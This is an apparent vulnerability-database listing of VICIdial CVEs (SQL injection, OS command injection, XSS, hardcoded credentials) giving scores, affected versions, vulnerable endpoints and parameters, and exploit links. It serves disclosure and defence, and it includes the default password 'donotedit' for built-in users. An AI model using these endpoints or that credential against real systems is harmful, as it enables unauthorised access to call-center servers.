CVSS: 9.0EPSS: 1%CPEs: 1EXPL: 5CVE-2024-8504 – VICIdial Authenticated Remote Code Execution
https://notcve.org/view.php?id=CVE-2024-8504
10 Sep 2024 — An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. An attacker with authenticated access to VICIdial version 2.14-917a as an agent can execute arbitrary shell commands as the root user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. • https://packetstorm.news/files/id/181953 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 2CVE-2024-8503 – VICIdial Unauthenticated SQL Injection
https://notcve.org/view.php?id=CVE-2024-8503
10 Sep 2024 — An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database. An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial version 2.14-917a to enumerate database records. By default, VICIdial stores plaintext credentials within the database. • https://packetstorm.news/files/id/181460 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 6.4EPSS: 0%CPEs: 4EXPL: 0CVE-2021-35377
https://notcve.org/view.php?id=CVE-2021-35377
06 Mar 2023 — Cross Site Scripting vulnerability found in VICIdial v2.14-610c and v.2.10-415c allows attackers execute arbitrary code via the /agc/vicidial.php, agc/vicidial-greay.php, and /vicidial/KHOMP_admin.php parameters. • http://vicidial.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 0CVE-2022-34879 – VICIDial 2.14b0.5 SVN 3550 was discovered to contain multiple Cross Site Scripting (XSS) vulnerabilities at /vicidial/admin.php.
https://notcve.org/view.php?id=CVE-2022-34879
05 Jul 2022 — Reflected Cross Site Scripting (XSS) vulnerabilities in AST Agent Time Sheet interface (/vicidial/AST_agent_time_sheet.php) of VICIdial via agent, and search_archived_data parameters. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. Unas vulnerabilidades de tipo Cross Site Scripting (XSS) Reflejadas en la interfaz de la hoja de tiempo del agente AST (/vicidial/AST_agent_time_sheet.php) de VICIdial por medio del agente y los parámetros search_archived_data. Este problema afecta: VICIdial ve... • https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 1CVE-2022-34878 – VICIDial 2.14b0.5 SVN 3550 was discovered to contain a SQL injection vulnerability at /vicidial/user_stats.php.
https://notcve.org/view.php?id=CVE-2022-34878
05 Jul 2022 — SQL Injection vulnerability in User Stats interface (/vicidial/user_stats.php) of VICIdial via the file_download parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. Una vulnerabilidad de inyección SQL en la interfaz User Stats (/vicidial/user_stats.php) de VICIdial por medio del parámetro file_download permite al atacante falsificar... • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 1CVE-2022-34877 – VICIDial 2.14b0.5 SVN 3550 was discovered to contains a SQL injection vulnerability at /vicidial/AST_agent_time_sheet.php.
https://notcve.org/view.php?id=CVE-2022-34877
05 Jul 2022 — SQL Injection vulnerability in AST Agent Time Sheet interface ((/vicidial/AST_agent_time_sheet.php) of VICIdial via the agent parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. Una vulnerabilidad de inyección SQL en la interfaz Agent Time Sheet AST ((/vicidial/AST_agent_... • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 1CVE-2022-34876 – VICIDial 2.14b0.5 SVN 3550 was discovered to contain multiple SQL injection vulnerability at /vicidial/admin.php.
https://notcve.org/view.php?id=CVE-2022-34876
05 Jul 2022 — SQL Injection vulnerability in admin interface (/vicidial/admin.php) of VICIdial via modify_email_accounts, access_recordings, and agentcall_email parameters allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. Una vulnerabilidad de inyección SQL en la interfaz de administración (/v... • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 1CVE-2021-46557
https://notcve.org/view.php?id=CVE-2021-46557
15 Feb 2022 — Vicidial 2.14-783a was discovered to contain a cross-site scripting (XSS) vulnerability via the input tabs. Se ha detectado que Vicidial versión 2.14-783a contiene una vulnerabilidad de tipo cross-site scripting (XSS) por medio de las pestañas de entrada • https://github.com/Zeyad-Azima/Vicidial-stored-XSS • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.8EPSS: 0%CPEs: 3EXPL: 4CVE-2013-7382 – VICIdial Manager - Send OS Command Injection
https://notcve.org/view.php?id=CVE-2013-7382
17 May 2014 — VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and earlier has a hardcoded password of donotedit for the (1) VDAD and (2) VDCL users, which makes it easier for remote attackers to obtain access. El marcador VICIDIAL (también conocido como Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1 y anteriores tiene una contraseña embebida de donotedit para los usuarios de (1) VDAD y (2) VDCL, lo que facilita a atacantes remotos obtener acceso. • https://www.exploit-db.com/exploits/29513 • CWE-255: Credentials Management Errors •
CVSS: 8.8EPSS: 33%CPEs: 3EXPL: 6CVE-2013-4468 – VICIdial Manager - Send OS Command Injection
https://notcve.org/view.php?id=CVE-2013-4468
08 Nov 2013 — VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and earlier allows remote authenticated users to execute arbitrary commands via shell metacharacters in the extension parameter in an OriginateVDRelogin action to manager_send.php. El marcador VICIDIAL (también conocido como Asterisk GUI Client) 2.8-403a, 2.7, 2.7RC1 y anteriores permite a usuarios remotos autenticados ejecutar comandos arbitrarios a través de metacaracteres de shell en el parámetro extension en una acción OriginateVDRelogin h... • https://packetstorm.news/files/id/123947 •